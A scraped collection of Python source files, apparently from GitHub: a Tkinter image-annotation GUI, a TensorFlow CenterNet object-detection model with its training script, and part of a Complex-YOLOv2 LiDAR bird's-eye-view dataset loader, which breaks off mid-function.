self.classlistbox.pack(side=tk.TOP, fill=tk.X)
self.classlistbox.bind('<<ListboxSelect>>', self.classlistbox_selected)
self.sc_class.config(command=self.classlistbox.yview)
# create anno object
self.lf_annolistbox = tk.LabelFrame(self.f_canvas, text='annotation list', fg='Blue')
self.lf_annolistbox.pack(side=tk.TOP, fill=tk.X)
self.sc_anno = tk.Scrollbar(self.lf_annolistbox)
self.sc_anno.pack(side=tk.RIGHT, fill=tk.Y)
annolistvar = tk.StringVar("")
self.annolistbox = tk.Listbox(self.lf_annolistbox, listvariable=annolistvar, height=8, yscrollcommand=self.sc_anno.set)
self.annolistbox.configure(selectmode="single")
self.annolistbox.pack(side=tk.TOP, fill=tk.X)
self.annolistbox.bind('<<ListboxSelect>>', self.annolistbox_selected)
self.sc_anno.config(command=self.annolistbox.yview)
self.lf_button = tk.LabelFrame(self.f_canvas, text='operation', fg='Blue')
self.lf_button.pack(side=tk.TOP, fill=tk.X)
# create load button
self.read_btn_text = tk.StringVar()
self.read_btn_text.set('Load Images')
self.read_btn_dir = tk.Button(self.lf_button, textvariable=self.read_btn_text, width=14, command=self.load_images)
self.read_btn_dir.pack(pady=5)
# create rect button
self.rect_btn_text = tk.StringVar()
self.rect_btn_text.set('Create Rect')
self.rect_btn_dir = tk.Button(self.lf_button, textvariable=self.rect_btn_text, width=14, command=self.create_rect)
self.rect_btn_dir.pack(pady=6)
# create verify button
self.verify_btn_text = tk.StringVar()
self.verify_btn_text.set('Verify Rect')
self.verify_btn_dir = tk.Button(self.lf_button, textvariable=self.verify_btn_text, width=14, command=self.verify_rect)
self.verify_btn_dir.pack(pady=6)
# create save button
self.save_btn_text = tk.StringVar()
self.save_btn_text.set("Save Anno")
self.save_btn = tk.Button(self.lf_button, textvariable=self.save_btn_text, width=14, command=self.on_save_btn_pressed)
self.save_btn.pack(pady=6)
# create image switch button
self.fr_btn = tk.Frame(self.frame)
self.fr_btn.pack(anchor=tk.S, padx=10, pady=2)
self.prev_btn = tk.Button(self.fr_btn, text='←Previous', command=self.on_previous_btn_pressed)
self.prev_btn.pack(side=tk.LEFT, padx=2)
self.entry_pagejump = tk.Entry(self.fr_btn, width=5)
self.entry_pagejump.pack(side=tk.LEFT, padx=5)
self.jump_btn = tk.Button(self.fr_btn, text='Jump', command=self.on_jump_btn_pressed)
self.jump_btn.pack(side=tk.LEFT, padx=2)
self.next_btn = tk.Button(self.fr_btn, text='Next→', command=self.on_next_btn_pressed)
self.next_btn.pack(side=tk.RIGHT, padx=5)
def on_previous_btn_pressed(self):
if self.ref_id == None: return
self.ref_id -= 1
if self.ref_id < 0:
self.ref_id = self.num_img_file - 1
self.load_image()
def on_jump_btn_pressed(self):
if self.ref_id is None: return
# Get image id
id_str = self.entry_pagejump.get()
        if (id_str is None) or (id_str == ""): return
id = int(id_str) - 1
if id < 0:
id = self.num_img_file - abs(id)
        if id >= self.num_img_file:
id = self.num_img_file - 1
self.ref_id = id
self.load_image()
self.entry_pagejump.delete(0, tk.END)
def on_next_btn_pressed(self):
if self.ref_id == None: return
self.ref_id += 1
if self.ref_id >= self.num_img_file:
self.ref_id = 0
self.load_image()
def on_save_btn_pressed(self):
pass
    def filelistbox_selected(self, event):
for i in self.filelistbox.curselection():
self.ref_id = i
self.load_image()
self.isDrawable = True
def classlistbox_selected(self, event):
for i in self.classlistbox.curselection():
self.class_index = self.class_dict[self.classlistbox.get(i)]
def annolistbox_selected(self, event):
for i in self.annolistbox.curselection():
self.anno_index = self.annolistbox.get(i)
    def on_left_clicked(self, event):
        pass
    def on_left_released(self, event):
        pass
    def on_right_clicked(self, event):
        pass
    def on_right_released(self, event):
        pass
    def on_mouse_move(self, event):
        pass
def open_img_directory(self):
self.image_dir = dlg.askdirectory()
if self.image_dir:
self.load_entry_dir.delete(0, 'end')
self.load_entry_dir.insert(0, self.image_dir)
filelist = os.listdir(self.image_dir)
filelist.sort(key = lambda x: int(x[:-4]))
self.filelistbox.delete(0, 'end')
self.ref_id = 0
self.data_list.clear()
for index, file in enumerate(filelist):
self.filelistbox.insert(index, file)
def open_save_directory(self):
self.save_dir = dlg.askdirectory()
if self.save_dir:
if not os.path.exists(self.save_dir):
try:
os.mkdir(self.save_dir)
                    msgbx.showinfo('Info', 'create annotation directory:\n' + self.save_dir)
except:
pass
self.save_entry_dir.delete(0, 'end')
self.save_entry_dir.insert(0, self.save_dir)
def load_images(self):
if self.image_dir:
dir = self.image_dir
dir = os.path.join(dir, "*.jpg")
file_list = sorted(glob.glob(dir))
self.num_img_file = len(file_list)
print("Number of images in {}: {}".format(self.image_dir, str(self.num_img_file)))
# read first image
if self.num_img_file > 0:
for i in range(self.num_img_file):
self.data_list.append(ImageData(file_list[i]))
self.ref_id = 0
self.load_image()
self.isDrawable = True
def load_image(self):
if self.ref_id == None: return
ref_filepath = self.get_reference_filepath()
self.ref_image_org = Image.open(ref_filepath)
self.show_images()
self.canvas_ref.config(height=self.ref_image_org.height, width=self.ref_image_org.width)
def show_images(self):
self.ref_image_display = ImageTk.PhotoImage(self.ref_image_org)
self.canvas_ref.create_image(0, 0, anchor="nw", image=self.ref_image_display)
def create_rect(self):
pass
def verify_rect(self):
pass
def get_reference_filepath(self):
return self.data_list[self.ref_id].file_path
def get_save_filepath(self):
filename = self.data_list[self.ref_id].base_name
return os.path.join(self.save_dir, filename)
def run(self):
self.mainWindow.mainloop()
if __name__ == '__main__':
data_annotation_tool = DataAnnotationTool()
data_annotation_tool.run()
``` |
{
"source": "530824679/CenterNet",
"score": 3
} |
#### File: CenterNet/model/network.py
```python
import numpy as np
import tensorflow as tf
from model.ops import *
from cfg.config import *
class CenterNet():
def __init__(self, is_train):
self.is_train = is_train
self.num_classes = model_params['num_classes']
self.inplanes = 64
def _block(self, inputs, filters, strides=1):
expansion = 1
conv1_bn_relu = conv2d(inputs, filters, [3, 3], strides, 'same', activation=tf.nn.relu, is_training=self.is_train, use_bn=True)
conv2_bn = conv2d(conv1_bn_relu, filters, [3, 3], 1, 'same', activation=None, is_training=self.is_train, use_bn=True)
if strides != 1 or self.inplanes != filters * expansion:
inputs = conv2d(inputs, filters, [1, 1], strides, 'valid', activation=None, is_training=self.is_train, use_bn=True)
self.inplanes = filters * expansion
out = tf.nn.relu(conv2_bn + inputs)
return out
def _module(self, x, num_channels, layers, strides=1):
for i in range(layers):
if i == 0:
x = self._block(x, num_channels, strides=strides)
else:
x = self._block(x, num_channels)
return x
def _resnet34(self, inputs):
net = conv2d(inputs, 64, [7, 7], 2, 'same', activation=tf.nn.relu, is_training=self.is_train, use_bn=True)
net = tf.layers.max_pooling2d(net, pool_size=3, strides=2, padding='same')
layer1 = self._module(net, 64, 3, 1)
layer2 = self._module(layer1, 128, 4, 2)
layer3 = self._module(layer2, 256, 6, 2)
layer4 = self._module(layer3, 512, 3, 2)
return layer1, layer2, layer3, layer4
def build_model(self, inputs):
c2, c3, c4, c5 = self._resnet34(inputs)
p5 = conv2d(c5, 128, [1, 1], is_training=self.is_train)
up_p5 = upsampling(p5, method='resize')
reduce_dim_c4 = conv2d(c4, 128, [1, 1], is_training=self.is_train)
p4 = 0.5 * up_p5 + 0.5 * reduce_dim_c4
up_p4 = upsampling(p4, method='resize')
reduce_dim_c3 = conv2d(c3, 128, [1, 1], is_training=self.is_train)
p3 = 0.5 * up_p4 + 0.5 * reduce_dim_c3
up_p3 = upsampling(p3, method='resize')
reduce_dim_c2 = conv2d(c2, 128, [1, 1], is_training=self.is_train)
p2 = 0.5 * up_p3 + 0.5 * reduce_dim_c2
features = conv2d(p2, 128, [3, 3], is_training=self.is_train)
with tf.variable_scope('detector'):
hm = conv2d(features, 64, [3, 3], is_training=self.is_train)
hm = tf.layers.conv2d(hm, self.num_classes, 1, 1, padding='valid', activation=tf.nn.sigmoid, bias_initializer=tf.constant_initializer(-np.log(99.)), name='hm')
wh = conv2d(features, 64, [3, 3], is_training=self.is_train)
wh = tf.layers.conv2d(wh, 2, 1, 1, padding='valid', activation=None, name='wh')
reg = conv2d(features, 64, [3, 3], is_training=self.is_train)
reg = tf.layers.conv2d(reg, 2, 1, 1, padding='valid', activation=None, name='reg')
return hm, wh, reg
def topk(self, hm, K=150):
batch, height, width, cat = tf.shape(hm)[0], tf.shape(hm)[1], tf.shape(hm)[2], tf.shape(hm)[3]
# [b,h*w*c]
scores = tf.reshape(hm, (batch, -1))
# [b,k]
topk_scores, topk_inds = tf.nn.top_k(scores, k=K)
# [b,k]
topk_clses = topk_inds % cat
topk_xs = tf.cast(topk_inds // cat % width, tf.float32)
topk_ys = tf.cast(topk_inds // cat // width, tf.float32)
topk_inds = tf.cast(topk_ys * tf.cast(width, tf.float32) + topk_xs, tf.int32)
return topk_scores, topk_inds, topk_clses, topk_ys, topk_xs
def decode(self, hm, wh, reg, k=150):
batch, height, width, channel = tf.shape(hm)[0], tf.shape(hm)[1], tf.shape(hm)[2], tf.shape(hm)[3]
hmax = tf.layers.max_pooling2d(hm, 3, 1, padding='same')
keep = tf.cast(tf.equal(hm, hmax), tf.float32)
heat = hm * keep
scores, inds, clses, ys, xs = self.topk(heat, K=k)
if reg is not None:
reg = tf.reshape(reg, (batch, -1, tf.shape(reg)[-1]))
# [b,k,2]
reg = tf.batch_gather(reg, inds)
xs = tf.expand_dims(xs, axis=-1) + reg[..., 0:1]
ys = tf.expand_dims(ys, axis=-1) + reg[..., 1:2]
else:
xs = tf.expand_dims(xs, axis=-1) + 0.5
ys = tf.expand_dims(ys, axis=-1) + 0.5
# [b,h*w,2]
wh = tf.reshape(wh, (batch, -1, tf.shape(wh)[-1]))
# [b,k,2]
wh = tf.batch_gather(wh, inds)
clses = tf.cast(tf.expand_dims(clses, axis=-1), tf.float32)
scores = tf.expand_dims(scores, axis=-1)
xmin = xs - wh[..., 0:1] / 2
ymin = ys - wh[..., 1:2] / 2
xmax = xs + wh[..., 0:1] / 2
ymax = ys + wh[..., 1:2] / 2
bboxes = tf.concat([xmin, ymin, xmax, ymax], axis=-1)
# [b,k,6]
detections = tf.concat([bboxes, scores, clses], axis=-1)
return detections
def calc_loss(self, pred_hm, pred_wh, pred_reg, true_hm, true_wh, true_reg, reg_mask, ind):
hm_loss = self.focal_loss(pred_hm, true_hm)
wh_loss = 0.05 * self.reg_l1_loss(pred_wh, true_wh, ind, reg_mask)
reg_loss = self.reg_l1_loss(pred_reg, true_reg, ind, reg_mask)
total_loss = hm_loss + wh_loss + reg_loss
return total_loss, hm_loss, wh_loss, reg_loss
def focal_loss(self, hm_pred, hm_true):
pos_mask = tf.cast(tf.equal(hm_true, 1.), dtype=tf.float32)
neg_mask = tf.cast(tf.less(hm_true, 1.), dtype=tf.float32)
neg_weights = tf.pow(1. - hm_true, 4)
pos_loss = -tf.log(tf.clip_by_value(hm_pred, 1e-5, 1. - 1e-5)) * tf.pow(1. - hm_pred, 2) * pos_mask
neg_loss = -tf.log(tf.clip_by_value(1. - hm_pred, 1e-5, 1. - 1e-5)) * tf.pow(hm_pred, 2.0) * neg_weights * neg_mask
num_pos = tf.reduce_sum(pos_mask)
pos_loss = tf.reduce_sum(pos_loss)
neg_loss = tf.reduce_sum(neg_loss)
loss = tf.cond(tf.greater(num_pos, 0), lambda: (pos_loss + neg_loss) / num_pos, lambda: neg_loss)
return loss
def reg_l1_loss(self, y_pred, y_true, indices, mask):
b = tf.shape(y_pred)[0]
k = tf.shape(indices)[1]
c = tf.shape(y_pred)[-1]
y_pred = tf.reshape(y_pred, (b, -1, c))
indices = tf.cast(indices, tf.int32)
y_pred = tf.batch_gather(y_pred, indices)
mask = tf.tile(tf.expand_dims(mask, axis=-1), (1, 1, 2))
total_loss = tf.reduce_sum(tf.abs(y_true * mask - y_pred * mask))
loss = total_loss / (tf.reduce_sum(mask) + 1e-5)
return loss
def bbox_giou(self, boxes_1, boxes_2):
"""
calculate regression loss using giou
:param boxes_1: boxes_1 shape is [x, y, w, h]
:param boxes_2: boxes_2 shape is [x, y, w, h]
:return:
"""
# transform [x, y, w, h] to [x_min, y_min, x_max, y_max]
boxes_1 = tf.concat([boxes_1[..., :2] - boxes_1[..., 2:] * 0.5,
boxes_1[..., :2] + boxes_1[..., 2:] * 0.5], axis=-1)
boxes_2 = tf.concat([boxes_2[..., :2] - boxes_2[..., 2:] * 0.5,
boxes_2[..., :2] + boxes_2[..., 2:] * 0.5], axis=-1)
boxes_1 = tf.concat([tf.minimum(boxes_1[..., :2], boxes_1[..., 2:]),
tf.maximum(boxes_1[..., :2], boxes_1[..., 2:])], axis=-1)
boxes_2 = tf.concat([tf.minimum(boxes_2[..., :2], boxes_2[..., 2:]),
tf.maximum(boxes_2[..., :2], boxes_2[..., 2:])], axis=-1)
# calculate area of boxes_1 boxes_2
boxes_1_area = (boxes_1[..., 2] - boxes_1[..., 0]) * (boxes_1[..., 3] - boxes_1[..., 1])
boxes_2_area = (boxes_2[..., 2] - boxes_2[..., 0]) * (boxes_2[..., 3] - boxes_2[..., 1])
# calculate the two corners of the intersection
left_up = tf.maximum(boxes_1[..., :2], boxes_2[..., :2])
right_down = tf.minimum(boxes_1[..., 2:], boxes_2[..., 2:])
# calculate area of intersection
inter_section = tf.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
# calculate union area
union_area = boxes_1_area + boxes_2_area - inter_area
# calculate iou
iou = inter_area / tf.maximum(union_area, 1e-5)
# calculate the upper left and lower right corners of the minimum closed convex surface
enclose_left_up = tf.minimum(boxes_1[..., :2], boxes_2[..., :2])
enclose_right_down = tf.maximum(boxes_1[..., 2:], boxes_2[..., 2:])
# calculate width and height of the minimun closed convex surface
enclose_wh = tf.maximum(enclose_right_down - enclose_left_up, 0.0)
# calculate area of the minimun closed convex surface
enclose_area = enclose_wh[..., 0] * enclose_wh[..., 1]
# calculate the giou
giou = iou - 1.0 * (enclose_area - union_area) / tf.maximum(enclose_area, 1e-5)
return giou
```
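The index arithmetic in `topk()` relies on the row-major flattening of an `(h, w, c)` heatmap, where the flat index is `(y * width + x) * cat + cls`. A quick numpy check of the same decomposition:
```python
import numpy as np

h, w, c = 4, 5, 3
hm = np.random.rand(h, w, c)
flat = hm.reshape(-1).argmax()  # same layout as tf.reshape(hm, (batch, -1))
cls = flat % c
x = flat // c % w
y = flat // c // w
assert hm[y, x, cls] == hm.max()
print('peak at y={}, x={}, class={}'.format(y, x, cls))
```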
#### File: CenterNet/model/ops.py
```python
import tensorflow as tf
def batch_norm(inputs, is_training):
bn = tf.layers.batch_normalization(
inputs=inputs,
training=is_training,
momentum = 0.99
)
return bn
def conv2d(inputs, filters, kernel_size, strides=1, padding='same', activation=tf.nn.relu, is_training=False, use_bn=True):
if use_bn:
conv = tf.layers.conv2d(
inputs=inputs,
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
use_bias = False
)
conv = batch_norm(conv, is_training)
else:
conv = tf.layers.conv2d(
inputs=inputs,
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding
)
if activation is not None:
conv = activation(conv)
return conv
def upsampling(inputs, method="deconv"):
assert method in ["resize", "deconv"]
if method == "resize":
input_shape = tf.shape(inputs)
output = tf.image.resize_nearest_neighbor(inputs, (input_shape[1] * 2, input_shape[2] * 2))
if method == "deconv":
        num_filter = inputs.shape.as_list()[-1]
        output = tf.layers.conv2d_transpose(
            inputs=inputs,
            filters=num_filter,
kernel_size=4,
strides=2,
padding='same'
)
return output
```
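Both branches of `upsampling()` double the spatial resolution: `resize` is parameter-free nearest-neighbour interpolation, while `deconv` learns a 4x4, stride-2 transposed convolution. The effect of the `resize` branch can be reproduced in plain numpy (a sketch for intuition only):
```python
import numpy as np

def nn_upsample_2x(x):
    # nearest-neighbour 2x upsampling of an NHWC array, matching
    # tf.image.resize_nearest_neighbor at twice the input size
    return x.repeat(2, axis=1).repeat(2, axis=2)

x = np.arange(4).reshape(1, 2, 2, 1)
print(nn_upsample_2x(x)[0, :, :, 0])
# [[0 0 1 1]
#  [0 0 1 1]
#  [2 2 3 3]
#  [2 2 3 3]]
```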
#### File: 530824679/CenterNet/train.py
```python
import os
import numpy as np
from tqdm import tqdm
import tensorflow as tf
from cfg.config import *
from data.dataset import *
from model.network import *
def train():
dataset_path = path_params['train_data_path']
log_dir = path_params['logs_path']
batch_size = solver_params['batch_size']
lr_type = solver_params['lr_type']
    # configure GPU memory growth
gpu_options = tf.GPUOptions(allow_growth=True)
config = tf.ConfigProto(gpu_options=gpu_options)
    # parse the training samples and annotations
image_num = len(open(dataset_path, 'r').readlines())
batch_num = int(math.ceil(float(image_num) / batch_size))
dataset = create_dataset(dataset_path, batch_num, batch_size=batch_size, is_shuffle=True)
iterator = dataset.make_one_shot_iterator()
inputs, batch_hm, batch_wh, batch_reg, batch_reg_mask, batch_ind = iterator.get_next()
inputs.set_shape([None, None, None, 3])
batch_hm.set_shape([None, None, None, None])
batch_wh.set_shape([None, None, None])
batch_reg.set_shape([None, None, None])
batch_reg_mask.set_shape([None, None])
batch_ind.set_shape([None, None])
    # build the network
model = CenterNet(True)
pred_hm, pred_wh, pred_reg = model.build_model(inputs)
    # compute the losses
loss_op = model.calc_loss(pred_hm, pred_wh, pred_reg, batch_hm, batch_wh, batch_reg, batch_reg_mask, batch_ind)
    # define the optimizer and learning-rate schedule
if lr_type == "CosineAnnealing":
global_step = tf.Variable(1.0, dtype=tf.float64, trainable=False, name='global_step')
warmup_steps = tf.constant(solver_params['warm_up_epochs'] * batch_num, dtype=tf.float64, name='warmup_steps')
train_steps = tf.constant(solver_params['epochs'] * batch_num, dtype=tf.float64, name='train_steps')
learning_rate = tf.cond(pred=global_step < warmup_steps,
true_fn=lambda: global_step / warmup_steps * solver_params['init_lr'],
false_fn=lambda: solver_params['end_lr'] + 0.5 * (solver_params['init_lr'] - solver_params['end_lr']) *
(1 + tf.cos((global_step - warmup_steps) / (train_steps - warmup_steps) * np.pi))
)
global_step_update = tf.assign_add(global_step, 1.0)
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss_op[0])
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
with tf.control_dependencies([optimizer, global_step_update]):
train_op = tf.no_op()
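        # For intuition, the warmup + cosine-annealing schedule above is
        # equivalent to this plain-Python sketch (an illustration, not part
        # of the original repository):
        #   def lr(step, warmup_steps, train_steps, init_lr, end_lr):
        #       if step < warmup_steps:
        #           return step / warmup_steps * init_lr
        #       return end_lr + 0.5 * (init_lr - end_lr) * (
        #           1 + math.cos((step - warmup_steps) / (train_steps - warmup_steps) * math.pi))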
else:
global_step = tf.Variable(0, trainable=False)
learning_rate = tf.train.exponential_decay(solver_params['lr'], global_step, solver_params['decay_steps'], solver_params['decay_rate'], staircase=True)
optimizer = tf.train.AdamOptimizer(learning_rate)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = optimizer.minimize(loss_op[0], global_step=global_step)
    # configure TensorBoard summaries
tf.summary.scalar("learning_rate", learning_rate)
tf.summary.scalar("hm_loss", loss_op[1])
tf.summary.scalar("wh_loss", loss_op[2])
tf.summary.scalar("reg_loss", loss_op[3])
tf.summary.scalar("total_loss", loss_op[0])
summary_op = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(log_dir, graph=tf.get_default_graph(), flush_secs=60)
    # Model saving
save_variable = tf.global_variables()
saver = tf.train.Saver(save_variable, max_to_keep=50)
with tf.Session(config=config) as sess:
sess.run(tf.global_variables_initializer())
if solver_params['pre_train']:
pretrained = np.load(path_params['pretrain_weights'], allow_pickle=True).item()
for variable in tf.trainable_variables():
for key in pretrained.keys():
                    key2 = variable.name.split(':')[0]  # rstrip(':0') would also strip trailing '0's from the name itself
if (key == key2):
sess.run(tf.assign(variable, pretrained[key]))
summary_writer.add_graph(sess.graph)
for epoch in range(1, 1 + solver_params['epochs']):
train_epoch_loss, train_epoch_hm_loss, train_epoch_wh_loss, train_epoch_reg_loss = [], [], [], []
for index in tqdm(range(batch_num)):
_, summary, train_total_loss, train_hm_loss, train_wh_loss, train_reg_loss, global_step_val, lr = sess.run([train_op, summary_op, loss_op[0], loss_op[1], loss_op[2], loss_op[3], global_step, learning_rate])
train_epoch_loss.append(train_total_loss)
train_epoch_hm_loss.append(train_hm_loss)
train_epoch_wh_loss.append(train_wh_loss)
train_epoch_reg_loss.append(train_reg_loss)
summary_writer.add_summary(summary, global_step_val)
train_epoch_loss, train_epoch_hm_loss, train_epoch_wh_loss, train_epoch_reg_loss = np.mean(train_epoch_loss), np.mean(train_epoch_hm_loss), np.mean(train_epoch_wh_loss), np.mean(train_epoch_reg_loss)
print("Epoch: {}, global_step: {}, lr: {:.8f}, total_loss: {:.3f}, loss_hm: {:.3f}, loss_wh: {:.3f}, loss_reg: {:.3f}".format(epoch, global_step_val, lr, train_epoch_loss, train_epoch_hm_loss, train_epoch_wh_loss, train_epoch_reg_loss))
saver.save(sess, os.path.join(path_params['checkpoints_path'], 'model.ckpt'), global_step=epoch)
sess.close()
if __name__ == '__main__':
train()
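    # A plain-numpy restatement of the CosineAnnealing schedule built above,
    # kept as comments; learning rates and step counts are illustrative values:
    #   def cosine_lr(step, warmup, total, init_lr=1e-3, end_lr=1e-6):
    #       if step < warmup:
    #           return step / warmup * init_lr
    #       p = (step - warmup) / (total - warmup)
    #       return end_lr + 0.5 * (init_lr - end_lr) * (1 + np.cos(p * np.pi))
    #   cosine_lr(10, 100, 1000)   # 1e-4 during the warmup ramp
    #   cosine_lr(550, 100, 1000)  # ~5e-4 at the cosine midpoint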
``` |
{
"source": "530824679/Complex-YOLOv2",
"score": 2
} |
#### File: Complex-YOLOv2/data/dataset.py
```python
import sys
ros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if ros_path in sys.path:
sys.path.remove(ros_path)
import cv2
import os
import math
import numpy as np
import tensorflow as tf
from cfg.config import data_params, path_params, model_params
from utils.process_utils import *
from data.augmentation import *
class Dataset(object):
def __init__(self):
self.data_path = path_params['data_path']
self.anchors = model_params['anchors']
self.num_classes = len(model_params['classes'])
self.input_height = model_params['input_height']
self.input_width = model_params['input_width']
self.grid_height = model_params['grid_height']
self.grid_width = model_params['grid_width']
self.iou_threshold = model_params['iou_threshold']
self.x_min = data_params['x_min']
self.x_max = data_params['x_max']
self.y_min = data_params['y_min']
self.y_max = data_params['y_max']
self.z_min = data_params['z_min']
self.z_max = data_params['z_max']
self.voxel_size = data_params['voxel_size']
def load_bev_image(self, data_num):
pcd_path = os.path.join(self.data_path, "object/training/livox", data_num+'.pcd')
if not os.path.exists(pcd_path):
raise KeyError("%s does not exist ... " % pcd_path)
pts = self.load_pcd(pcd_path)
roi_pts = self.filter_roi(pts)
bev_image = self.transform_bev_image(roi_pts)
return bev_image
def load_bev_label(self, data_num):
txt_path = os.path.join(self.data_path, "object/training/label", data_num + '.txt')
if not os.path.exists(txt_path):
raise KeyError("%s does not exist ... " %txt_path)
label = self.load_label(txt_path)
bev_label = self.transform_bev_label(label)
return bev_label
def load_pcd(self, pcd_path):
pts = []
f = open(pcd_path, 'r')
data = f.readlines()
f.close()
line = data[9].strip('\n')
pts_num = eval(line.split(' ')[-1])
for line in data[11:]:
line = line.strip('\n')
xyzi = line.split(' ')
x, y, z, i = [eval(i) for i in xyzi[:4]]
pts.append([x, y, z, i])
assert len(pts) == pts_num
        res = np.zeros((pts_num, len(pts[0])), dtype=np.float64)  # np.float is removed in recent NumPy
for i in range(pts_num):
res[i] = pts[i]
return res
def scale_to_255(self, a, min, max, dtype=np.uint8):
return (((a - min) / float(max - min)) * 255).astype(dtype)
def calc_xyz(self, data):
center_x = (data[16] + data[19] + data[22] + data[25]) / 4.0
center_y = (data[17] + data[20] + data[23] + data[26]) / 4.0
center_z = (data[18] + data[21] + data[24] + data[27]) / 4.0
return center_x, center_y, center_z
def calc_hwl(self, data):
height = (data[15] - data[27])
width = math.sqrt(math.pow((data[17] - data[26]), 2) + math.pow((data[16] - data[25]), 2))
length = math.sqrt(math.pow((data[17] - data[20]), 2) + math.pow((data[16] - data[19]), 2))
return height, width, length
def calc_yaw(self, data):
angle = math.atan2(data[17] - data[26], data[16] - data[25])
if (angle < -1.57):
return angle + 3.14 * 1.5
else:
return angle - 1.57
def cls_type_to_id(self, data):
type = data[1]
if type not in model_params['classes']:
return -1
return model_params['classes'].index(type)
def calc_angle(self, im, re):
"""
param: im(float): imaginary parts of the plural
param: re(float): real parts of the plural
return: The angle at which the objects rotate
around the Z axis in the velodyne coordinate system
"""
if re > 0:
return np.arctan(im / re)
elif im < 0:
return -np.pi + np.arctan(im / re)
else:
return np.pi + np.arctan(im / re)
def load_label(self, label_path):
lines = [line.rstrip() for line in open(label_path)]
label_list = []
for line in lines:
data = line.split(' ')
data[4:] = [float(t) for t in data[4:]]
type = data[1]
if type not in model_params['classes']:
continue
label = np.zeros([8], dtype=np.float32)
label[0], label[1], label[2] = self.calc_xyz(data)
label[3], label[4], label[5] = self.calc_hwl(data)
label[6] = self.calc_yaw(data)
label[7] = self.cls_type_to_id(data)
label_list.append(label)
return np.array(label_list)
def transform_bev_label(self, label):
image_width = (self.y_max - self.y_min) / self.voxel_size
image_height = (self.x_max - self.x_min) / self.voxel_size
boxes_list = []
boxes_num = label.shape[0]
for i in range(boxes_num):
center_x = (-label[i][1] / self.voxel_size).astype(np.int32) - int(np.floor(self.y_min / self.voxel_size))
center_y = (-label[i][0] / self.voxel_size).astype(np.int32) + int(np.ceil(self.x_max / self.voxel_size))
width = label[i][4] / self.voxel_size
height = label[i][5] / self.voxel_size
left = center_x - width / 2
right = center_x + width / 2
top = center_y - height / 2
bottom = center_y + height / 2
if ((left > image_width) or right < 0 or (top > image_height) or bottom < 0):
continue
if (left < 0):
center_x = (0 + right) / 2
width = 0 + right
if (right > image_width):
center_x = (image_width + left) / 2
width = image_width - left
if (top < 0):
center_y = (0 + bottom) / 2
height = 0 + bottom
if (bottom > image_height):
center_y = (top + image_height) / 2
height = image_height - top
box = [center_x, center_y, width, height, label[i][6], label[i][7]]
boxes_list.append(box)
while len(boxes_list) < 300:
boxes_list.append([0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
return np.array(boxes_list, dtype=np.float32)
def transform_bev_image(self, pts):
x_points = pts[:, 0]
y_points = pts[:, 1]
z_points = pts[:, 2]
i_points = pts[:, 3]
# convert to pixel position values
x_img = (-y_points / self.voxel_size).astype(np.int32) # x axis is -y in LIDAR
y_img = (-x_points / self.voxel_size).astype(np.int32) # y axis is -x in LIDAR
# shift pixels to (0, 0)
x_img -= int(np.floor(self.y_min / self.voxel_size))
y_img += int(np.floor(self.x_max / self.voxel_size))
# clip height value
pixel_values = np.clip(a=z_points, a_min=self.z_min, a_max=self.z_max)
# rescale the height values
pixel_values = self.scale_to_255(pixel_values, min=self.z_min, max=self.z_max)
# initalize empty array
x_max = math.ceil((self.y_max - self.y_min) / self.voxel_size)
y_max = math.ceil((self.x_max - self.x_min) / self.voxel_size)
# Height Map & Intensity Map & Density Map
height_map = np.zeros((y_max, x_max), dtype=np.float32)
intensity_map = np.zeros((y_max, x_max), dtype=np.float32)
density_map = np.zeros((y_max, x_max), dtype=np.float32)
for k in range(0, len(pixel_values)):
if pixel_values[k] > height_map[y_img[k], x_img[k]]:
height_map[y_img[k], x_img[k]] = pixel_values[k]
if i_points[k] > intensity_map[y_img[k], x_img[k]]:
intensity_map[y_img[k], x_img[k]] = i_points[k]
density_map[y_img[k], x_img[k]] += 1
for j in range(0, y_max):
for i in range(0, x_max):
if density_map[j, i] > 0:
density_map[j, i] = np.minimum(1.0, np.log(density_map[j, i] + 1) / np.log(64))
height_map /= 255.0
intensity_map /= 255.0
rgb_map = np.zeros((y_max, x_max, 3), dtype=np.float32)
rgb_map[:, :, 0] = density_map # r_map
rgb_map[:, :, 1] = height_map # g_map
rgb_map[:, :, 2] = intensity_map # b_map
return rgb_map
def filter_roi(self, pts):
mask = np.where((pts[:, 0] >= self.x_min) & (pts[:, 0] <= self.x_max) &
(pts[:, 1] >= self.y_min) & (pts[:, 1] <= self.y_max) &
(pts[:, 2] >= self.z_min) & (pts[:, 2] <= self.z_max))
pts = pts[mask]
return pts
def preprocess_true_data(self, image, labels):
image = np.array(image)
image, labels = random_horizontal_flip(image, labels)
anchor_array = np.array(model_params['anchors'], dtype=np.float32)
n_anchors = np.shape(anchor_array)[0]
valid = (np.sum(labels, axis=-1) > 0).tolist()
labels = labels[valid]
y_true = np.zeros(shape=[self.grid_height, self.grid_width, n_anchors, (6 + 1 + self.num_classes)], dtype=np.float32)
boxes_xy = labels[:, 0:2]
boxes_wh = labels[:, 2:4]
boxes_angle = labels[:, 4:5]
true_boxes = np.concatenate([boxes_xy, boxes_wh, boxes_angle], axis=-1)
anchors_max = anchor_array / 2.
anchors_min = - anchor_array / 2.
valid_mask = boxes_wh[:, 0] > 0
wh = boxes_wh[valid_mask]
# [N, 1, 2]
wh = np.expand_dims(wh, -2)
boxes_max = wh / 2.
boxes_min = - wh / 2.
# [N, 1, 2] & [5, 2] ==> [N, 5, 2]
intersect_mins = np.maximum(boxes_min, anchors_min)
intersect_maxs = np.minimum(boxes_max, anchors_max)
# [N, 5, 2]
intersect_wh = np.maximum(intersect_maxs - intersect_mins, 0.)
intersect_area = intersect_wh[..., 0] * intersect_wh[..., 1]
box_area = wh[..., 0] * wh[..., 1]
anchor_area = anchor_array[:, 0] * anchor_array[:, 1]
# [N, 5]
iou = intersect_area / (box_area + anchor_area - intersect_area + tf.keras.backend.epsilon())
# Find best anchor for each true box [N]
best_anchor = np.argmax(iou, axis=-1)
for t, k in enumerate(best_anchor):
i = int(np.floor(true_boxes[t, 0] / 32.))
j = int(np.floor(true_boxes[t, 1] / 32.))
c = labels[t, 5].astype('int32')
